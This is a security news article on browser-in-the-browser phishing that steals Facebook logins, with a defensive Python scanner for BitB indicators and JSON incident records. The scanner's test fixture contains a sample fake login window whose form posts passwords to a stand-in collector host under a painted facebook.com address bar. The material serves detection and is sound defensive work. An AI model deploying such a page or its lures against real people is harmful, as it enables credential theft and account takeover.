Facebook: Phishing Scams Exploit Browser Attacks to Steal Facebook Passwords

Cybercriminals Exploit Browser-in-the-Browser Attacks to Steal Facebook Credentials

Cybersecurity researchers at Trellix have identified a surge in phishing campaigns leveraging browser-in-the-browser (BitB) attacks to steal Facebook login credentials. These sophisticated schemes target the platform’s over three billion users, aiming to hijack accounts for data theft, identity fraud, or scam distribution.

The attacks typically begin with phishing emails designed to trigger panic. Common lures include:

  • Fake copyright infringement warnings from law firms.
  • False alerts about unauthorized login attempts.
  • Urgent notifications claiming an account is about to be shut down due to suspicious activity.

Victims are directed to click shortened, manipulated URLs that appear legitimate. The landing page then draws a convincing pop-up "window" that mimics Facebook's login page. In a BitB attack this pop-up is not a real browser window at all: it is HTML and CSS rendered inside the attacker's own page, with the genuine facebook.com URL hardcoded as text in a painted address bar and a fake CAPTCHA added for authenticity. The fake authentication flow collects personal details (name, email, phone number, date of birth) before prompting users to "confirm" their password, which hands the attackers the account.
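Because the fake window's address bar is ordinary page content rather than browser chrome, the claimed URL can be found in the served HTML and compared with the origin the page actually came from. The following scanner is an added example written for this page, not code from Trellix or the article; the sample pages, the `.invalid` hostnames and the heuristic thresholds are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Visible URLs: a BitB "address bar" renders the target URL as plain page text.
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?:/[^\s\"'<>]*)?")


class _PageFacts(HTMLParser):
    """Collect the few facts the heuristics need from raw HTML."""

    def __init__(self):
        super().__init__()
        self.visible_urls = []
        self.iframe_srcs = []
        self.form_actions = []
        self.password_inputs = 0
        self._hidden_depth = 0  # inside <script>/<style>, text is not visible

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("script", "style"):
            self._hidden_depth += 1
        elif tag == "iframe":
            self.iframe_srcs.append(a.get("src", ""))
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._hidden_depth:
            self._hidden_depth -= 1

    def handle_data(self, data):
        if not self._hidden_depth:
            self.visible_urls.extend(URL_RE.findall(data))


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_for_bitb(html, served_from,
                  trusted_hosts=("facebook.com", "www.facebook.com", "m.facebook.com")):
    """Return a list of BitB indicators; an empty list means nothing suspicious.

    served_from is the URL the browser actually fetched the page from
    (the real address bar), which the painted one tries to impersonate.
    """
    facts = _PageFacts()
    facts.feed(html)
    served = _host(served_from)
    findings = []

    # 1. The BitB tell: a trusted login URL drawn as page text on a page that was
    #    not served from that host, next to a password box.
    if served not in trusted_hosts and facts.password_inputs:
        claimed = {_host(u) for u in facts.visible_urls if _host(u) in trusted_hosts}
        for h in sorted(claimed):
            findings.append(f"painted address bar claims {h}, page served from {served}")

    # 2. Credentials posted to a host that is neither the page's origin nor the trusted one.
    for action in facts.form_actions:
        h = _host(action)
        if h and h != served and h not in trusted_hosts:
            findings.append(f"form posts credentials to {h}")

    # 3. Fake window whose body is loaded from a third origin.
    for src in facts.iframe_srcs:
        h = _host(src)
        if h and h != served and h not in trusted_hosts:
            findings.append(f"cross-origin iframe from {h}")

    return findings


# Constructed sample (not a real campaign page): a fake window drawn in HTML, with the
# genuine Facebook URL as plain text where the address bar would be, plus a fake CAPTCHA.
BITB_SAMPLE = """
<html><body>
<div class="fake-window">
  <div class="titlebar">Log in to Facebook</div>
  <div class="addressbar">https://www.facebook.com/login.php</div>
  <form method="post" action="https://collector.example.invalid/save">
    <input name="email"><input type="password" name="pass">
    <img src="captcha.png" alt="captcha"><button>Log In</button>
  </form>
</div>
<script>var bar = "https://www.facebook.com/";</script>
</body></html>
"""

# Constructed benign sample: a login form actually served from facebook.com.
REAL_SAMPLE = """<html><body><form method="post" action="/login/">
<input name="email"><input type="password" name="pass"></form></body></html>"""

if __name__ == "__main__":
    for line in scan_for_bitb(BITB_SAMPLE, "https://login-verify.example.invalid/step2"):
        print("INDICATOR:", line)
    print("benign findings:", scan_for_bitb(REAL_SAMPLE, "https://www.facebook.com/login.php"))
```

The URL inside the `<script>` block is deliberately ignored: only text a user could see counts as a painted address bar, which keeps pages that merely link to Facebook from being flagged. The scanner is a triage heuristic for proxy logs or URL-sandbox output, not a substitute for checking the real address bar.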

Trellix notes that the BitB technique exploits user familiarity with login processes, making the deception nearly undetectable at a glance. One reliable tell is to try dragging the pop-up: a genuine browser window can be moved outside the parent tab, whereas a BitB "window" is clipped at the edge of the page that draws it. The stolen credentials are then used for further fraud, including account takeovers and spreading scams via victims' contacts.

While the article suggests mitigation strategies like two-factor authentication (2FA), the focus remains on the attack's mechanics and its growing prevalence as a threat to Facebook users. Note that a fake login flow can just as easily ask for an SMS or authenticator code, so only phishing-resistant second factors (security keys or passkeys, which are bound to the real origin) fully defeat this class of page.

Source: https://www.infosecurity-magazine.com/news/phishing-scams-exploit-browser/

Facebook TPRM report: https://www.rankiteo.com/company/meta

{
  "id": "met1768321762",
  "linkid": "meta",
  "type": "Cyber Attack",
  "date": "1/2026",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks"
}

{
  "affected_entities": [
    {
      "customers_affected": "Unknown (Potentially large-scale)",
      "industry": "Technology/Social Media",
      "name": "Facebook",
      "size": "Large (Over 3 billion users)",
      "type": "Social Media Platform"
    }
  ],
  "attack_vector": "Phishing Email",
  "customer_advisories": "Facebook users advised to enable 2FA and recognize phishing attempts",
  "data_breach": {
    "data_exfiltration": "Yes (via fake authentication screens)",
    "personally_identifiable_information": "Name, Email Address, Phone Number, Date of Birth",
    "sensitivity_of_data": "High",
    "type_of_data_compromised": ["Login Credentials", "Personally Identifiable Information (PII)"]
  },
  "description": "Cybercriminals are using a browser-in-the-browser (BitB) attack technique to steal login credentials of Facebook users. The attack involves phishing emails that lure users into fake authentication screens designed to harvest usernames and passwords. The goal is to take over accounts for identity fraud, data theft, or spreading scams to contacts.",
  "impact": {
    "brand_reputation_impact": "Potential damage to Facebook's reputation due to phishing attacks",
    "data_compromised": "Login Credentials, Personal Information (Name, Email, Phone Number, Date of Birth)",
    "identity_theft_risk": "High"
  },
  "lessons_learned": "Users should be cautious of unexpected emails, verify URLs before entering credentials, and enable two-factor authentication (2FA) to prevent account takeovers.",
  "motivation": ["Identity Fraud", "Data Theft", "Scam Distribution"],
  "post_incident_analysis": {
    "corrective_actions": "User education on phishing, 2FA enforcement, and improved detection of fake login pages",
    "root_causes": "Social engineering, fake authentication screens, and user trust in familiar login interfaces"
  },
  "recommendations": [
    "Enable two-factor authentication (2FA) on all accounts",
    "Avoid clicking on unfamiliar links in emails",
    "Log in directly via the official website if concerned about account notifications",
    "Treat urgent or unexpected requests with suspicion"
  ],
  "references": [{"source": "Trellix"}],
  "response": {
    "communication_strategy": "Advisories to users on recognizing phishing attempts and enabling 2FA",
    "third_party_assistance": "Trellix (Cybersecurity Research)"
  },
  "title": "Facebook Credential Theft via Browser-in-the-Browser (BitB) Phishing Attack",
  "type": "Phishing",
  "vulnerability_exploited": "Social Engineering, Fake Authentication Screens"
}